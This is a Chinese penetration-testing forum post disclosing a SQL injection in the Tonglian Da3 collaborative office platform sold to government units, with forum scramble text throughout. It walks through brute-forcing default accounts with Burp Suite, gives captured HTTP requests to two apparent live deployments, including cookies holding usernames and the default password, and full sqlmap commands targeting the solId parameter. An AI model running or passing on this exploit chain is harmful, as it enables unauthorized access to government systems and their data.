中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin 时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

: j) r" p: l0 J" h, K) f3 `, q4 O
3 F0 v8 V# K8 b, g$ O3 H1 a& `4 ]

4 ?! Z) R) j4 y' L 平台简介： 9 D, r& y; c. T p6 Z4 H# [+ x

6 C9 `6 J! |: f! x5 k: M" E' { " h1 g( s }( q+ W- y6 S9 L

7 R. ?% G$ R& i 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" X/ v' u; c, T! }8 e同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( K, K* G) L; m; V同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！0 s% D9 U) j) ^# ^4 f3 f5 b3 d

2 o) E( A( \: a" e8 ]1 X4 | / c# S+ w- {1 j

% ~7 ` f( q9 G; z6 `, i$ _8 v; [$ B 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址： 3 x+ O& j. k; u% G

0 u9 g2 @. f! F; y ( u% w7 I( _2 B( o5 n) b t

9 K) J* U' @! d8 C1 M7 F http://1.1.1.1:7197/cap-aco/#（案例2-） 8 Z: F/ }/ y& R3 R& G4 f

5 d5 q `. N$ D) ?2 C, h http://www.XXOO.com （案例1-官网网站） " t2 g5 n* r+ g" b, R+ I1 n, G+ C

5 n7 Q, l8 ?& w3 M4 D- R8 G2 A * C. d+ l# H/ {; B# B2 | F+ q

r' @- M+ X/ U3 R: _* C/ F4 W 漏洞详情:) I* l3 ^$ C9 g- m; \; s0 }

% j0 D- U- D+ F+ M' |* W 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试7 Q6 y4 ?& r+ ^3 K! R. E

7 e8 {' i3 ?% l% s% @9 z/ _ 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图：( W) i5 H" `2 I6 W( q

3 }' G& B2 f3 a- r P) v7 V9 u 8 ~# t- R. c, e- b, c4 D

) j/ s* S& |0 e3 a y 8 D9 Y0 ~! @% A: h2 `% J% u& K

) L: J" G7 H3 h" H8 f4 {4 D status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： ; [' n, z) {( \- g a/ u+ q

3 {5 J4 |( P4 U* @7 [$ d" W) @! n 1、案例1-官方网站 N/ Q! R+ i" p& c {) j& M

; g8 a; W# Y. }) J GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1) m$ v3 N# B8 k7 ~( q! ]( U {1 ]. G

' ~" x N1 i( y6 s Host: www.XXOO.com : N: T0 z6 `3 J' C2 O

w- E6 [# i+ ^# ~* K; {$ W- X Proxy-Connection: Keep-Alive4 D& }3 k0 A+ L. i7 U: {

B9 G$ E: M- O& w; X* J7 ] Accept: application/json, text/javascript, */*; q=0.017 L/ |7 X- ^) `& m$ I9 ]

, B# M" p. j9 i+ o Accept-Language: zh-CN. {* r; N3 {5 e6 T# c

4 H4 q. t6 L) _: R4 X4 D Content-Type: application/json! a5 N% Z+ g% c3 O( u9 H# u9 c G

6 {/ `0 O! ?" [# C1 u% G User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko & ^6 L/ `7 i% m! n# T. Y

5 P) W/ m2 ?) `! {0 _ X-Requested-With: XMLHttpRequest 2 K& T- f' b% ~8 B {# s

' d4 G6 i. J0 P" J6 Y ~" _) h8 U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 . B; p/ Q+ `, j3 }- y* q

( D& s+ b a' E8 V7 _ Accept-Encoding: gzip, deflate, sdch . g3 {7 e1 |, `- C

$ G5 d$ u1 T/ h- }7 A) [+ Y Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e- M6 b! }9 r) I$ r5 L' z3 \

5 w' G. F: X" Z" T 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* O7 r: w9 q; F# P+ E

4 J p; F* Z5 \4 A3 {" p " o4 h; O6 C2 P: G4 ^

( v" z$ F7 [. z. p' b 9 s6 a9 U( |& A

4 y+ e! _" w/ r7 _; }" \- p* i - K& \: ~ X- Z3 T5 L

" w5 _; B( {8 H& u! E, f% ` . _6 y( g; g$ I; s8 r ?) Y

) W8 P0 r5 ~& H# A6 D, l- t ' f, N) O8 Z+ j$ j

* D. n0 ^, o- a2 ?# X 2、案例2-某天河云平台 ) o. P6 V$ Y8 w6 G. A% V

6 }' G8 L& B) e( @6 y GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1" _) [0 F6 z& f+ m8 U/ d

9 \+ ]1 O( F# N Host: 1.1.1.:7197% C/ {6 o8 n* y9 [6 K" D

n4 w' i4 P2 P% C f) S. c Accept: application/json, text/javascript, */*; q=0.01! [9 n% f6 K0 n& |# {3 N$ k. J

) z) g3 y- Q) q$ J; H( X0 o X-Requested-With: XMLHttpRequest ; f, [% Y2 @: [ y1 O

5 e2 @6 ^$ g, p; W& P User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 2 k& x f% A4 X+ I- o

. ^+ Z+ M- s- M# m' U( p1 R1 u Content-Type: application/json 5 f) ], E; A# i, ?8 H! @7 |3 c' C

) G; Y; ?& g d/ _8 D* H* q Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 * j! c' E+ N' Y( p0 L

3 k" ^1 u2 ^9 P+ a Accept-Language: zh-CN,zh;q=0.82 k3 ]4 G/ C0 \$ r0 f( |1 [

0 j& ]9 @. @2 P- @ \+ O% A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 % |' Y: P; B$ ~% Z

F: u0 X' b& M0 { Connection: close+ k1 }+ ~/ b9 l- D) T

- b, e$ M) {6 g, @. a% p. c! _ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 0 d6 |$ }: `1 {& j

% j* @( Y8 f' `) R. B* e/ v! O, h 5 l! }0 O/ ^0 {9 ` Z

* @9 d' O3 O7 @. e4 k0 P
( h9 e, V# x# b2 k7 l* c4 E9 w

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)